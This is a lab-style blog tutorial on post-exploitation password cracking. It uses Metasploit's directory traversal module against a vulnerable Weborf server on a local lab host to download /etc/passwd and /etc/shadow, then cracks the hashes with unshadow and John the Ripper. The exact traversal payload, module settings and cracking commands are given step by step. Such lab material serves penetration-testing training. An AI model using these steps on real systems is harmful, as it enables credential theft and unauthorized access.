• Lucifer

Post-Exploit Password Cracking

In previous posts, we covered several different ways of obtaining the contents of the /etc/shadow file where user password hashes are stored. In this post, we will go through yet another way of grabbing the /etc/shadow file from the compromised system. We will then go through the steps of cracking the hashes to obtain the actual password values. So let's see step by step how we can do post-exploit password cracking.

Post-Exploit Password Cracking

Step 1: Starting Vulnerable Server

First, let's start our vulnerable server application as root:

sudo weborf

Post-Exploit Password Cracking

Now open up a new tab by command: Ctrl + Shift + T

Step 2: Creating File List

We already saw how the directory traversal vulnerability in Weborf can be exploited manually. In this post, we will automate the process with Metasploit and combine it with downloading the password files. The Metasploit auxiliary module that we will use requires a file list to know which files to download from the compromised system. Create the file list as instructed below. We are using the URL encoding to replace "/" with "%2f":

cat > files.txt etc%2fpasswd etc%2fshadow

Post-Exploit Password Cracking

Press ENTER, then hit Ctrl+D to save the file and return to the prompt.

Step 3: Starting Metasploit Framework

Now start the Metasploit Framework. Don't forget the* -L* option.

msfconsole -L

Post-Exploit Password Cracking

Step 4: Selecting Module

Next, let's select the Generic HTTP Directory Traversal Utility module. It checks the targets for the directory traversal vulnerability and depending on the selected option, can download specific files or check if it is possible to write files outside of the www directory. Select the module as follows:

use auxiliary/scanner/http/http_traversal

Post-Exploit Password Cracking

Step 5: Setting Scanner Options

There are quite a few options we need to set for this module. The first two should be familiar by now: RHOSTS for remote (target) host(s) and RPORT for the target port (which is set to 80 by default, so we need to change it to the Weborf's default port). The next three options are TRIGGER, for the path that triggers the vulnerability, ACTION, which in our case is DOWNLOAD, and FILELIST, which specifies the list of files to download. Set the options exactly as shown below:

set RHOSTS skillsetlocal.com set RPORT 8080 set TRIGGER ..%2f..%2f..%2f..%2f..%2f..%2f..%2f set ACTION DOWNLOAD set FILELIST files.txt

Post-Exploit Password Cracking

Make sure to use all capital letters for DOWNLOAD, otherwise, you will get an error.

Step 6: Running Scan

Now enter run to launch the attack.


The scan should be done very quickly and you should see that our target files were downloaded. Note the location where the files were saved, we will use it in the next step.

Enter exit to close Metasploit Framework and return to the regular prompt.


Post-Exploit Password Cracking

Step 7: Unshadow

For the purpose of cracking, we’ll use John the Ripper. Here’s a description from the maker openwall:

John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS (the latter requires a contributed patch). Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos/AFS and Windows LM hashes, as well as DES-based tripcodes, plus many more hashes and ciphers in "community enhanced" -jumbo versions and/or with other contributed patches.

Reference - http://www.openwall.com/john/doc/

Sounds like it’s perfect for the job. We could run JtR directly on the /etc/shadow file, but a better approach would be to create a new file by using unshadow. It will allow JtR to use some of the GECOS fields information from the /etc/passwd file as well. Use unshadow as follows, specifying files downloaded by the Metasploit module. The format is unshadow PASSWDFILE SHADOW FILE, in that order, so make sure you are entering the correct file names. The yyyymmddhhmmss part is the timestamp, and xxxxxx and yyyyyy are numeric identifiers, which will be different for the* /etc/passwd* and /etc/shadow. We are saving the new file as passwords.

sudo unshadow .msf4/loot/*yyyymmddhhmmss*_default_127.0.0.1_lfi.data_*xxxxxx*.txt .msf4/loot/*yyyymmddhhmmss*_default_127.0.0.1_lfi.data_*yyyyyy*.txt > passwords


sudo unshadow .msf4/loot/20200826071515_default_127.0.0.1_lfi.data_827959.txt .msf4/loot/20200826071515_default_127.0.0.1_lfi.data_297245.txt > passwords

Post-Exploit Password Cracking

Let's view the new file to make sure everything went OK:

cat passwords

Post-Exploit Password Cracking

Let's get cracking!

Step 8: Running John the Ripper

Issue the following command to use JtR with our passwords file with default options.

sudo john passwords

Post-Exploit Password Cracking

Understand that the crack could take days in a real scenario. But simple passwords like “password1” or “password2” should be cracked very quickly.

Step 9: Reading Wordlist

For stronger passwords, we can look at the available JtR options, such as using a wordlist. There are many large wordlists available on the Internet, some of them included with the standard Kali Linux installation. You can also create your own, which we did for this lab. Issue the following command to read it:

cat wordlist.txt

Post-Exploit Password Cracking

To speed up the process, we cheated a bit and included only the actual user passwords. Feel free to experiment later and try adding more words or use different JtR options.

Step 10: Running JtR with Wordlist

To use the wordlist, simply reissue the command and add the -w option pointing to the file:

sudo john passwords -w=wordlist.txt

Post-Exploit Password Cracking

You can see the rest of the passwords.

Also notice that John picks up where it left off, only cracking the passwords that weren't cracked in the previous sessions.

Step 11: Viewing Cracked Passwords

To see the passwords extracted from a certain file, use the --show option as follows:

sudo john --show passwords

Post-Exploit Password Cracking

Also Read: Client Side Exploitation

That's it for this post hope you like it, please share it with your friends and more amazing stuff is waiting for you, checkout shop at Payground or visit HERE.

Join Telegram Group

©2020 by Payground. Proudly created with Wix.com